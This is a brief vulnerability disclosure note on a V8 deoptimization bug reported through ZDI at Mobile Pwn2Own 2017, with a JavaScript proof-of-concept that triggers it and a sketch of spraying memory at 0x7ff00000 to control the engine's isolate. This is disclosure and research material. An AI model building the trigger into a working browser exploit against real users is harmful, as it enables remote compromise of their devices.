Pwn2own: V8 - isolate control via function deoptimization

Mobile Pwn2Own 2017 V8 ZDI-CAN-5336 漏洞 PoC

The following bug was disclosed by ZDI during pacsec/mobile pwn2own 2017. Reference ZDI-CAN-5336

When the function deoptmizes, v8 engine has to restore the context. And in this function, deoptimizer doesn't work properly, the context is confused to an arguments_marker after the deoptimization and the isolate point to 0x7ff00000. So after we spray to control this address, we also control the isolate.

poc:

    function SDD() {
        function foo() {}
        foo[0] = 0;
        foo.prototype = 0;

        try {
            throw 0;
        } catch(e) {
            [0].forEach(bar);
        }

        function bar() {
            foo[200];
        }

        for (var i = 0; i < 0x2000000; ++i) {}
    }

    SDD();
    SDD();
    SDD();